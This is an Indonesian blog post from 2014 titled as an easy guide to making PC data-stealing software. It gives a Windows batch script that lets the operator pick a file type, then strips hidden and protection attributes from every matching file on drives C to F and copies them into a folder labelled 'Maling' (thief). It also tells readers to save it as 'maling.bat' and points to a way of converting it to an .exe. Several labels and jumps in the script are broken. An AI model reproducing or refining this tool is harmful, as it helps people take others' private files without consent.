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Jumat, 21 November 2014
Cara mudah membuat software pencuri data PC
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1 Buka Notepad
2 Copy code dibawah ini
echo off color 0a mode 31,15 if "%1"=="/?" goto Sej if not "%n%" == "" set n= :MetDtg cls title GRM msg * Jalankan aplikasi msg * Dengan damai echo. echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ³ Program Aplikasi ³ echo ³ GRM V 3 .2 ³ echo ³ By Ahmad Rohman ³ echo ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ :awal ption echo ------EKSTENSI FILE---------- echo [1] 3gp [4] jpg [7] docx echo [2] wmv [5] txt [8] xlsx echo [3] avi [6] mpg [9] Mp3 echo [10] exe [11] rar [12] EXIT echo ============================= echo. set/p "pil=Masukan Pilihan: " if %pil%=='' goto option if %pil%==1 goto 3gp if %pil%==2 goto wmv if %pil%==3 goto avi if %pil%==4 goto jpg if %pil%==5 goto txt if %pil%==6 goto mpg if %pil%==7 goto docx if %pil%==8 goto xlsx if %pil%==9 goto Mp3 if %pil%==10 goto exe if %pil%==11 goto rar if %pil%==12 goto keluar goto option :3gp Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.3gp') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls goto awal goto option :goto wmv Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.wmv') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) cls echo sudah tidak ditemukan file nyah pause >nul goto option :avi Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.avi') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls goto option :jpg Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.jpg') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls goto option :txt Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.txt') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nulcls goto option :mpg Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.mpg') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls goto option :docx Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.docx') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls goto option :xls Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.xls') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls goto option :exe Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.exe') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls goto option :rar Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.rar') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls goto option :Mp3 Set Maling=%computername%_%random% If not exist "%Maling%" Md "%Maling%" For %%a in (C D E F) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.MP3') do ( attrib -s -h -r "%%b" copy "%%b" "%Maling%" /y) ) echo sudah tidak ditemukan file nyah pause >nul cls :keluar Exit
2. pastekan pada notepad
3. simpan dengan ekstensi .bat
contoh "maling.bat"
Baca juga "
cara merubah file .bat menjadi .exe
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